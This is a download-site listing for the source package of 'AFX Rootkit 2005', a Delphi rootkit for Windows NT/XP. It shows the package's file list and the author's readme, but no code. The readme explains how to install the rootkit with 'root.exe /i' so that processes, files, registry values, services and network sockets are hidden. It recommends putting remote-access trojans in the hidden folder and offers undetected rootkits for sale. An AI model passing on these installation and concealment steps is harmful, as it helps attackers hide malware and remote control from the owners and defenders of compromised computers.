myhideproc_path_reg

所属分类:系统编程
开发工具:Delphi
文件大小:223KB
下载次数:223
上传日期:2008-04-28 12:44:59
上 传 者aikale
说明:  隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标
(Hidden processes, modules, file, directory, registry, services, TCP_UDP connection taskbar icon)

文件列表:
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\afxCodeHook.pas (32469, 2005-03-03)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\hook.dpr (37244, 2005-03-04)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\JwaNtStatus.pas (248906, 2004-05-12)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\JWaWinBase.pas (699846, 2004-05-12)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\JwaWinNT.pas (343841, 2004-05-12)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\JwaWinSvc.pas (73320, 2002-04-09)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\JwaWinType.pas (46652, 2005-03-03)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\Native.pas (153195, 2004-09-05)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\root.dpr (6364, 2005-03-04)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\RSRC.RC (21, 2005-03-04)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src\WinDefines.inc (3533, 2002-07-18)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005\src (0, 2007-11-26)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627\AFXRootkit2005 (0, 2005-04-11)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标\20059411185627 (0, 2005-09-04)
隐藏进程、模块、文件、目录、注册表、服务、TCP_UDP连接、任务栏图标 (0, 2007-11-26)
说明.htm (3332, 2007-11-24)
系统说明.txt (1609, 2007-10-27)
下载说明.txt (1609, 2007-10-27)

AFX Rootkit 2005 by Aphex http://www.iamaphex.net aphex@iamaphex.net WARNING -> FOR WINDOWS NT/2000/XP/2003 ONLY! This program patches Windows API to hide certain objects from being listed. Current Version Hides: a) Processes b) Handles c) Modules d) Files & Folders e) Registry Values f) Services g) TCP/UDP Sockets h) Systray Icons Configuring a computer with the rootkit is simple... 1. Create a new folder with a uniqiue name i.e. "c:\winnt\rewt\" 2. In this folder place the root.exe i.e. "c:\winnt\rewt\root.exe" 3. Execute root.exe with the "/i" parameter i.e. "start c:\winnt\rewt\root.exe /i" 4. Inside this folder place any other programs or files. Everything inside the root folder is now invisible! If you place other services or programs in the root folder they will be invisible from process/file/dll/handle/socket/etc listing. However, all programs in the root folder can see each other. Registry value names are hidden differently from everything else. The name must begin with the root folder name followed by "\" and other characters i.e. "rewt\hiddenstartup1". Also, the root folder is unique throughout the system. This means "c:\rewt\", "c:\winnt\rewt\" and "c:\winnt\system32\rewt\" all will be hidden because they all share the root folder name "rewt". So make sure you pick a good name! NOTE: Most RATs have an install method that involves copying the EXE to a system folder, this is bad because if the process is executed from outside the root folder it will be visible! If possible disable this startup method. Removal: Don't ask me for help on this! If you install it on yourself make sure you know how to remove it! Method 1 1. Run the root.exe with the "/u" parameter 2. Delete all the files associated with it 3. Reboot Method 2 1. Boot into safe mode 2. Locate the service with the root folder name 3. Remove the service and delete all the files associated with it 4. Reboot ATTENTION!! Undetected rootkits are on sale for $100 each. Payment by paypal, egold, western union, check or money order! Contact aphex@iamaphex.net for purchase. ATTENTION!!

近期下载者

相关文件


收藏者